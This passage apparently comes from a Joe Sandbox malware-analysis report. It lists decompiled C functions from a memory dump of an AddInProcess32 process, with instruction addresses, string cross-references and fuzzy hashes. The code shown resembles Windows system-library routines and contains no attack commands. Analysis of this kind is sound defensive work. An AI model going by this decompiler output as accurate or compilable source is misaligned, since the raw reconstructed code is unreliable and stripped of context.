						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0187f71d
0x0187f722
0x0187f726
0x018c4770
0x0187f765
0x0187f769
0x0187f769
0x0187f732
0x018c477a
0x00000000
0x018c477a
0x0187f738
0x0187f73a
0x0187f73c
0x0187f73f
0x0187f746
0x0187f778
0x0187f7a9
0x0187f7a9
0x0187f754
0x0187f75a
0x0187f75d
0x0187f75f
0x0187f761
0x0187f76f
0x0187f771
0x0187f771
0x0187f76f
0x0187f763
0x00000000
0x0187f763
0x0187f77d
0x0187f7a3
0x0187f7a5
0x00000000
0x0187f7a5
0x0187f77f
0x0187f782
0x0187f784
0x0187f786
0x00000000
0x00000000
0x00000000
0x0187f788
0x0187f748
0x0187f74d
0x0187f78d
0x0187f793
0x0187f7b7
0x0187f7bc
0x00000000
0x0187f7bc
0x0187f798
0x00000000
0x00000000
0x0187f79d
0x0187f7b0
0x00000000
0x0187f7b0
0x0187f79f
0x00000000
0x0187f74f
0x0187f74f
0x00000000
0x0187f74f

Strings

Actx , xrefs: 0187F73F

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 0ee4e83dd3f8ec792c56f987ba77a9726d7ec7a36600c7c54aff43a06e39af96
Instruction ID: 174c9ec30eee58b3e65f083bb1b8f56e3c19377c85d51ca2d2d6c27705867fba
Opcode Fuzzy Hash: 0ee4e83dd3f8ec792c56f987ba77a9726d7ec7a36600c7c54aff43a06e39af96
Instruction Fuzzy Hash: CB11B2353086868BEB258E1F8891736F695AB867E8F24452AE771CB391DB70CA408740

Uniqueness

Uniqueness Score: -1.00%

Function 01908DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01908DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1930d50);
				E018AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E018E5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E018ADEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E018ADEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E018AD130(_t34, _t39, _t40);
			}

0x01908df1
0x01908df1
0x01908df1
0x01908df1
0x01908df1
0x01908df1
0x01908df3
0x01908df8
0x01908dfd
0x01908e00
0x01908e0e
0x01908e2a
0x01908e36
0x01908e38
0x01908e3c
0x01908e46
0x01908e46
0x01908e36
0x01908e50
0x01908e56
0x01908e59
0x01908e5c
0x01908e60
0x01908e67
0x01908e6d
0x01908e73
0x01908e74
0x01908eb1
0x01908ebd

Strings

Critical error detected %lx, xrefs: 01908E21

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 5d4cebb08a9be3d45d4ba8b7df3ce5881c56e3ae0c83a59cb392d1aba0f83159
Instruction ID: 1d03dfacce36be038bfb704bf0d221ed92e920f1b067ff9ff443454fcb887d25
Opcode Fuzzy Hash: 5d4cebb08a9be3d45d4ba8b7df3ce5881c56e3ae0c83a59cb392d1aba0f83159
Instruction Fuzzy Hash: FA1175B5E40348DFEB26DFA88905B9DBBB4AB14315F20421EE128AB282C3741A02CF15

Uniqueness

Uniqueness Score: -1.00%

Function 01925BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01925BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1931178);
				E018AD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01924C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0189D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01925542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x19460e8;
								if( *0x19460e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x19460e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01899710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01896DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0189F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0189F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0189F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0189FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0189FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0189F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0189F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01924CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E018AD130(_t427, _t494, _t511);
				}
			}

0x01925ba5
0x01925baa
0x01925baf
0x01925bb4
0x01925bb6
0x01925bbc
0x01925bbe
0x01925bc4
0x01925bcd
0x01925bd3
0x01925bd6
0x01925bdc
0x01925be0
0x01925be3
0x01925beb
0x01925bf2
0x01925bf8
0x01925bfe
0x01925c04
0x01925c0e
0x01925c18
0x01925c1f
0x01925c25
0x01925c2a
0x01925c2c
0x01925c32
0x01925c3a
0x01925c3f
0x01925c42
0x01925c48
0x01925c5b
0x01925c5b
0x01925c2c
0x01925cb7
0x01925cb9
0x01925cbf
0x01925cc2
0x01925cca
0x01925ccb
0x01925ccb
0x01925cd1
0x01925cd7
0x01925cda
0x01925ce1
0x01925ce4
0x01925ce7
0x01925ced
0x01925cf3
0x01925cf9
0x01925cff
0x01925d08
0x01925d0a
0x01925d0e
0x01925d10
0x00000000
0x00000000
0x01925d16
0x01925d1a
0x00000000
0x00000000
0x01925d20
0x01925d22
0x01925d25
0x01925d2f
0x01925d2f
0x01925d33
0x01925d3d
0x01925d49
0x01925d4b
0x00000000
0x00000000
0x01925d5a
0x01925d5d
0x01925d60
0x00000000
0x00000000
0x01925d66
0x01925d69
0x00000000
0x00000000
0x01925d6f
0x01925d6f
0x01925d73
0x01925d79
0x01925d7f
0x01925d86
0x01925d95
0x01925d98
0x01925dba
0x01925dcb
0x01925dce
0x01925dd3
0x01925dd6
0x01925dd8
0x01925de6
0x01925dec
0x01925dee
0x01925df1
0x01925df3
0x0192635a
0x0192635a
0x00000000
0x0192635a
0x01925dfe
0x01925e02
0x01925e05
0x01925e07
0x01925e10
0x01925e13
0x01925e1b
0x01925e1c
0x01925e21
0x01925e22
0x01925e23
0x01925e25
0x01925e2a
0x01925e2c
0x01925e2e
0x01925e36
0x01925e39
0x01925e42
0x01925e47
0x01925e4d
0x01925e54
0x01925e54
0x01925e54
0x01925e2e
0x01925e5c
0x01925e5f
0x01925e62
0x01925e64
0x01925e6b
0x01925e70
0x01925e7a
0x01925e7a
0x01925e7a
0x01925e6b
0x01925e7e
0x01925e7f
0x01925e7f
0x01925e81
0x01925e87
0x01925e8b
0x01925e8c
0x01925e8c
0x01925e8c
0x01925e9a
0x01925e9c
0x01925ea2
0x01925ea6
0x01925f50
0x01925f50
0x01925f57
0x01925f66
0x01925f66
0x01925f66
0x01925f68
0x01925f6a
0x019263d0
0x00000000
0x01925f70
0x01925f70
0x01925f91
0x01925f9c
0x01925f9e
0x01925fa4
0x01925fa6
0x0192638c
0x01926392
0x019263a1
0x019263a7
0x019263af
0x019263af
0x019263bd
0x019263d8
0x00000000
0x019263d8
0x01925fac
0x01925fb2
0x01925fb4
0x01925fbd
0x01925fc6
0x01925fce
0x01925fd4
0x01925fdc
0x01925fec
0x01925fed
0x01925fee
0x01925fef
0x01925ff9
0x01925ffa
0x01925ffb
0x01925ffc
0x01926000
0x01926004
0x01926012
0x01926012
0x01926018
0x01926019
0x0192601a
0x0192601b
0x0192601c
0x01926020
0x01926059
0x0192605c
0x01926061
0x01926061
0x01926022
0x01926022
0x01926022
0x01926025
0x0192602a
0x0192602b
0x01926031
0x01926037
0x01926038
0x0192603e
0x01926048
0x01926049
0x0192604a
0x0192604b
0x0192604c
0x0192604d
0x01926053
0x01926054
0x01926054
0x01926062
0x01926065
0x01926067
0x0192606a
0x01926070
0x01926075
0x01926076
0x01926081
0x01926087
0x01926095
0x01926099
0x0192609e
0x019260a4
0x019260ae
0x019260b0
0x019260b3
0x019260b6
0x019260b8
0x019260ba
0x019260ba
0x019260ba
0x019260ba
0x019260be
0x019260c0
0x019260c5
0x019260c5
0x019260c5
0x019260c6
0x019260cd
0x01926114
0x019260cf
0x019260cf
0x019260d4
0x019260d5
0x019260da
0x019260db
0x019260e1
0x019260e2
0x019260e8
0x019260f8
0x019260fd
0x019260fe
0x01926102
0x01926104
0x01926107
0x01926109
0x0192610b
0x0192610b
0x0192610b
0x0192610b
0x0192610f
0x0192610f
0x01926117
0x0192611a
0x0192611f
0x01926125
0x01926134
0x01926139
0x0192613f
0x01926146
0x01926148
0x0192614b
0x0192614d
0x0192614f
0x0192614f
0x0192614f
0x0192614f
0x01926153
0x01926159
0x01926159
0x0192615c
0x01926163
0x01926169
0x0192616c
0x01926172
0x01926181
0x01926186
0x01926187
0x0192618b
0x01926191
0x01926195
0x019261a3
0x019261bb
0x019261c0
0x019261c3
0x019261cc
0x019261d0
0x019261dc
0x019261de
0x019261e1
0x019261e4
0x019261e6
0x019261e8
0x019261e8
0x019261e8
0x019261e8
0x019261e6
0x019261ec
0x019261f3
0x01926203
0x01926209
0x0192620a
0x01926216
0x0192621d
0x01926227
0x01926241
0x01926246
0x0192624c
0x01926257
0x01926259
0x0192625c
0x0192625e
0x01926260
0x01926260
